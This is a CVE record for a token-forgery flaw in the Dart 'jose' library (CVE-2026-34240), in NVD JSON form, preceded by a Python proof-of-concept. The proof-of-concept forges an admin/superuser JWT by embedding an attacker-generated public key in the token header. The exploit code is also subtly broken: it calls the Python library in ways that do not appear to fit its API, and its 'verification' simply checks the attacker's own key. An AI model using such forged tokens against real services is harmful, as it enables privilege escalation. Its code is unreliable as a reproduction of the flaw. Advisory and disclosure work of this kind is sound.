CVE-2026-34240

import json from jose import jwk from jose import jwt # Generate a new RSA key pair controlled by the attacker private_key = jwk.construct(k="RSA", generate=True) public_key = private_key.public_key() # Convert public key to JWK format generated_jwk = public_key.to_dict() # Create a malicious payload payload = { "user": "admin", "role": "superuser", "exp": 9999999999 } # Embed the attacker's public key in the JOSE header # Vulnerable libraries will use this key for verification headers = { "alg": "RS256", "jwk": generated_jwk } # Sign the token with the attacker's private key token = jwt.encode(payload, private_key.to_pem().decode('utf-8'), algorithm="RS256", headers=headers) print(f"Forged JWT Token: {token}") # Verification (simulating the vulnerable behavior) # In a vulnerable scenario, the library extracts the 'jwk' from the header to verify data = jwt.decode(token, public_key, algorithms=["RS256"]) print(f"Verified Payload: {data}")

{"cve": {"id": "CVE-2026-34240", "sourceIdentifier": "[email protected]", "published": "2026-03-31T16:16:33.090", "lastModified": "2026-04-06T15:02:26.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "JOSE is a Javascript Object Signing and Encryption (JOSE) library. Prior to version 0.3.5+1, a vulnerability in jose could allow an unauthenticated, remote attacker to forge valid JWS/JWT tokens by using a key embedded in the JOSE header (jwk). The vulnerability exists because key selection could treat header-provided jwk as a verification candidate even when that key was not present in the trusted key store. Since JOSE headers are untrusted input, an attacker could exploit this by creating a token payload, embedding an attacker-controlled public key in the header, and signing with the matching private key. Applications using affected versions for token verification are impacted. This issue has been patched in version 0.3.5+1. A workaround for this issue involves rejecting tokens where header jwk is present unless that jwk matches a key already present in the application's trusted key store."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:appsup-dart:jose:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.3.5\\+1", "matchCriteriaId": "900F124C-8D70-47CF-BE74-3D47A796AB50"}]}]}], "references": [{"url": "https://github.com/appsup-dart/jose/commit/b07799aac1f56a9a21483feac026272aab30cc5d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/appsup-dart/jose/security/advisories/GHSA-vm9r-h74p-hg97", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}